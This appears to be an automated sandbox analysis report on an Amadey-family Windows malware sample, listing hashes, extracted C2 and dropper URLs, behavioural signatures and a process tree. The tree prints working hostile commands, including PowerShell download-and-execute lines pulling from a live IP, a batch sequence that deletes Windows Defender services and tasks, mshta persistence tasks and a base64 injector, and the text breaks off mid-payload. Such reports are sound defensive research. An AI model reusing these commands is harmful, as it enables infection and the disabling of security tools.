Analysis

  • max time kernel
    115s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    29/03/2025, 01:29

General

  • Target

    6e0232bbb2c5acff98a3726b808d7e0343be831656849ff82ccdc49631ee47d6.exe

  • Size

    1.8MB

  • MD5

    7988ece243a744701d58da578abdf90e

  • SHA1

    077d464f60b8c9e5bb40f26935363f263c655cd6

  • SHA256

    6e0232bbb2c5acff98a3726b808d7e0343be831656849ff82ccdc49631ee47d6

  • SHA512

    32689d3a7bcb3351c786b6683ab2d7c0fc40b7f3dadb26d21d73b38fc40898913ab70fefc1b2d497b25e9c921c5c223803f0f4de56dcd390ca1f387b25c2da28

  • SSDEEP

    24576:wU/l6R1236C3vZHRUuHmFsl6RfGchgfAZZgLJwaBfzvEjj/AQAsX9J9Las4/2SHt:wU/13vZHRTdCGqpUHxzvIAdEMOk6S

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 19 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 8 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 30 IoCs
  • Identifies Wine through registry keys 2 TTPs 12 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 46 IoCs
  • Drops file in Windows directory 15 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 61 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 48 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of FindShellTrayWindow 23 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\6e0232bbb2c5acff98a3726b808d7e0343be831656849ff82ccdc49631ee47d6.exe
    "C:\Users\Admin\AppData\Local\Temp\6e0232bbb2c5acff98a3726b808d7e0343be831656849ff82ccdc49631ee47d6.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2152
    • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
      "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2964
      • C:\Users\Admin\AppData\Local\Temp\10362200101\8b3a4b7b17.exe
        "C:\Users\Admin\AppData\Local\Temp\10362200101\8b3a4b7b17.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Writes to the Master Boot Record (MBR)
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        PID:892
      • C:\Users\Admin\AppData\Local\Temp\10363220101\FMXv4s3.exe
        "C:\Users\Admin\AppData\Local\Temp\10363220101\FMXv4s3.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:580
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 580 -s 28
          4⤵
          • Loads dropped DLL
          PID:1336
      • C:\Users\Admin\AppData\Local\Temp\10364170101\amnew.exe
        "C:\Users\Admin\AppData\Local\Temp\10364170101\amnew.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2312
        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
          "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
          4⤵
          • Downloads MZ/PE file
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:772
          • C:\Users\Admin\AppData\Local\Temp\10043430101\0997323fea.exe
            "C:\Users\Admin\AppData\Local\Temp\10043430101\0997323fea.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1832
            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              "C:\Users\Admin\AppData\Local\Temp\10043430101\0997323fea.exe"
              6⤵
              • Downloads MZ/PE file
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2896
          • C:\Users\Admin\AppData\Local\Temp\10043440101\4039a84031.exe
            "C:\Users\Admin\AppData\Local\Temp\10043440101\4039a84031.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:1048
            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              "C:\Users\Admin\AppData\Local\Temp\10043440101\4039a84031.exe"
              6⤵
              • Downloads MZ/PE file
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2092
      • C:\Users\Admin\AppData\Local\Temp\10364180101\apple.exe
        "C:\Users\Admin\AppData\Local\Temp\10364180101\apple.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2076
        • C:\Users\Admin\AppData\Local\Temp\22.exe
          "C:\Users\Admin\AppData\Local\Temp\22.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1668
          • C:\Windows\system32\cmd.exe
            "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F650.tmp\F661.tmp\F662.bat C:\Users\Admin\AppData\Local\Temp\22.exe"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1736
            • C:\Users\Admin\AppData\Local\Temp\22.exe
              "C:\Users\Admin\AppData\Local\Temp\22.exe" go
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: CmdExeWriteProcessMemorySpam
              • Suspicious use of WriteProcessMemory
              PID:2012
              • C:\Windows\system32\cmd.exe
                "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F72B.tmp\F72C.tmp\F72D.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"
                7⤵
                • Drops file in Program Files directory
                • Suspicious use of WriteProcessMemory
                PID:1112
                • C:\Windows\system32\sc.exe
                  sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                  8⤵
                  • Launches sc.exe
                  PID:2248
                • C:\Windows\system32\sc.exe
                  sc start ddrver
                  8⤵
                  • Launches sc.exe
                  PID:1220
                • C:\Windows\system32\timeout.exe
                  timeout /t 1
                  8⤵
                  • Delays execution with timeout.exe
                  PID:2272
                • C:\Windows\system32\sc.exe
                  sc stop ddrver
                  8⤵
                  • Launches sc.exe
                  PID:868
                • C:\Windows\system32\sc.exe
                  sc start ddrver
                  8⤵
                  • Launches sc.exe
                  PID:1908
                • C:\Windows\system32\takeown.exe
                  takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                  8⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:692
                • C:\Windows\system32\icacls.exe
                  icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                  8⤵
                  • Possible privilege escalation attempt
                  • Modifies file permissions
                  PID:1700
                • C:\Windows\system32\sc.exe
                  sc stop "WinDefend"
                  8⤵
                  • Launches sc.exe
                  PID:1944
                • C:\Windows\system32\sc.exe
                  sc delete "WinDefend"
                  8⤵
                  • Launches sc.exe
                  PID:1932
                • C:\Windows\system32\reg.exe
                  reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                  8⤵
                    PID:1820
                  • C:\Windows\system32\sc.exe
                    sc stop "MDCoreSvc"
                    8⤵
                    • Launches sc.exe
                    PID:1504
                  • C:\Windows\system32\sc.exe
                    sc delete "MDCoreSvc"
                    8⤵
                    • Launches sc.exe
                    PID:872
                  • C:\Windows\system32\reg.exe
                    reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                    8⤵
                      PID:1048
                    • C:\Windows\system32\sc.exe
                      sc stop "WdNisSvc"
                      8⤵
                      • Launches sc.exe
                      PID:1684
                    • C:\Windows\system32\sc.exe
                      sc delete "WdNisSvc"
                      8⤵
                      • Launches sc.exe
                      PID:556
                    • C:\Windows\system32\reg.exe
                      reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                      8⤵
                        PID:1632
                      • C:\Windows\system32\sc.exe
                        sc stop "Sense"
                        8⤵
                        • Launches sc.exe
                        PID:1016
                      • C:\Windows\system32\sc.exe
                        sc delete "Sense"
                        8⤵
                        • Launches sc.exe
                        PID:2200
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                        8⤵
                          PID:2860
                        • C:\Windows\system32\sc.exe
                          sc stop "wscsvc"
                          8⤵
                          • Launches sc.exe
                          PID:2224
                        • C:\Windows\system32\sc.exe
                          sc delete "wscsvc"
                          8⤵
                          • Launches sc.exe
                          PID:2880
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                          8⤵
                            PID:2296
                          • C:\Windows\system32\sc.exe
                            sc stop "SgrmBroker"
                            8⤵
                            • Launches sc.exe
                            PID:2924
                          • C:\Windows\system32\sc.exe
                            sc delete "SgrmBroker"
                            8⤵
                            • Launches sc.exe
                            PID:2940
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                            8⤵
                              PID:2144
                            • C:\Windows\system32\sc.exe
                              sc stop "SecurityHealthService"
                              8⤵
                              • Launches sc.exe
                              PID:2192
                            • C:\Windows\system32\sc.exe
                              sc delete "SecurityHealthService"
                              8⤵
                              • Launches sc.exe
                              PID:2260
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                              8⤵
                                PID:2868
                              • C:\Windows\system32\sc.exe
                                sc stop "webthreatdefsvc"
                                8⤵
                                • Launches sc.exe
                                PID:3032
                              • C:\Windows\system32\sc.exe
                                sc delete "webthreatdefsvc"
                                8⤵
                                • Launches sc.exe
                                PID:3036
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                8⤵
                                  PID:2172
                                • C:\Windows\system32\sc.exe
                                  sc stop "webthreatdefusersvc"
                                  8⤵
                                  • Launches sc.exe
                                  PID:3060
                                • C:\Windows\system32\sc.exe
                                  sc delete "webthreatdefusersvc"
                                  8⤵
                                  • Launches sc.exe
                                  PID:2916
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                  8⤵
                                    PID:2896
                                  • C:\Windows\system32\sc.exe
                                    sc stop "WdNisDrv"
                                    8⤵
                                    • Launches sc.exe
                                    PID:2596
                                  • C:\Windows\system32\sc.exe
                                    sc delete "WdNisDrv"
                                    8⤵
                                    • Launches sc.exe
                                    PID:2804
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                    8⤵
                                      PID:2932
                                    • C:\Windows\system32\sc.exe
                                      sc stop "WdBoot"
                                      8⤵
                                      • Launches sc.exe
                                      PID:2792
                                    • C:\Windows\system32\sc.exe
                                      sc delete "WdBoot"
                                      8⤵
                                      • Launches sc.exe
                                      PID:2928
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                      8⤵
                                        PID:2092
                                      • C:\Windows\system32\sc.exe
                                        sc stop "WdFilter"
                                        8⤵
                                        • Launches sc.exe
                                        PID:1892
                                      • C:\Windows\system32\sc.exe
                                        sc delete "WdFilter"
                                        8⤵
                                        • Launches sc.exe
                                        PID:2328
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                        8⤵
                                          PID:2976
                                        • C:\Windows\system32\sc.exe
                                          sc stop "SgrmAgent"
                                          8⤵
                                          • Launches sc.exe
                                          PID:324
                                        • C:\Windows\system32\sc.exe
                                          sc delete "SgrmAgent"
                                          8⤵
                                          • Launches sc.exe
                                          PID:2560
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                          8⤵
                                            PID:264
                                          • C:\Windows\system32\sc.exe
                                            sc stop "MsSecWfp"
                                            8⤵
                                            • Launches sc.exe
                                            PID:2856
                                          • C:\Windows\system32\sc.exe
                                            sc delete "MsSecWfp"
                                            8⤵
                                            • Launches sc.exe
                                            PID:2552
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                            8⤵
                                              PID:2132
                                            • C:\Windows\system32\sc.exe
                                              sc stop "MsSecFlt"
                                              8⤵
                                              • Launches sc.exe
                                              PID:2244
                                            • C:\Windows\system32\sc.exe
                                              sc delete "MsSecFlt"
                                              8⤵
                                              • Launches sc.exe
                                              PID:2280
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                              8⤵
                                                PID:1652
                                              • C:\Windows\system32\sc.exe
                                                sc stop "MsSecCore"
                                                8⤵
                                                • Launches sc.exe
                                                PID:1212
                                              • C:\Windows\system32\sc.exe
                                                sc delete "MsSecCore"
                                                8⤵
                                                • Launches sc.exe
                                                PID:1060
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                8⤵
                                                  PID:2504
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                  8⤵
                                                    PID:2864
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                    8⤵
                                                      PID:972
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                      8⤵
                                                        PID:3008
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                        8⤵
                                                          PID:836
                                                        • C:\Windows\system32\sc.exe
                                                          sc stop ddrver
                                                          8⤵
                                                          • Launches sc.exe
                                                          PID:2516
                                                        • C:\Windows\system32\sc.exe
                                                          sc delete ddrver
                                                          8⤵
                                                          • Launches sc.exe
                                                          PID:2020
                                              • C:\Users\Admin\AppData\Local\Temp\10364360101\a8b7a511c0.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10364360101\a8b7a511c0.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of FindShellTrayWindow
                                                • Suspicious use of SendNotifyMessage
                                                PID:1780
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c schtasks /create /tn Xt51Fma96q1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\QEkySXm5b.hta" /sc minute /mo 25 /ru "Admin" /f
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1968
                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                    schtasks /create /tn Xt51Fma96q1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\QEkySXm5b.hta" /sc minute /mo 25 /ru "Admin" /f
                                                    5⤵
                                                    • System Location Discovery: System Language Discovery
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:1424
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  mshta C:\Users\Admin\AppData\Local\Temp\QEkySXm5b.hta
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Modifies Internet Explorer settings
                                                  PID:920
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DR1MKE8DBTXK0GZNEQP8AFH4CNRTNLID.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                    5⤵
                                                    • Blocklisted process makes network request
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Downloads MZ/PE file
                                                    • Loads dropped DLL
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2608
                                                    • C:\Users\Admin\AppData\Local\TempDR1MKE8DBTXK0GZNEQP8AFH4CNRTNLID.EXE
                                                      "C:\Users\Admin\AppData\Local\TempDR1MKE8DBTXK0GZNEQP8AFH4CNRTNLID.EXE"
                                                      6⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1080
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\10364370121\am_no.cmd" "
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:2944
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /t 2
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Delays execution with timeout.exe
                                                  PID:692
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1700
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                    5⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:880
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1684
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                    5⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1600
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1744
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                    5⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1228
                                                • C:\Windows\SysWOW64\schtasks.exe
                                                  schtasks /create /tn "sNMFfmaFnNt" /tr "mshta \"C:\Temp\yeq3RBrEv.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Scheduled Task/Job: Scheduled Task
                                                  PID:2040
                                                • C:\Windows\SysWOW64\mshta.exe
                                                  mshta "C:\Temp\yeq3RBrEv.hta"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Modifies Internet Explorer settings
                                                  PID:2948
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                    5⤵
                                                    • Blocklisted process makes network request
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Downloads MZ/PE file
                                                    • Loads dropped DLL
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1644
                                                    • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                      6⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:2476
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10364621121\2GF9eeb.cmd"
                                                3⤵
                                                • System Location Discovery: System Language Discovery
                                                PID:264
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10364621121\2GF9eeb.cmd"
                                                  4⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2132
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z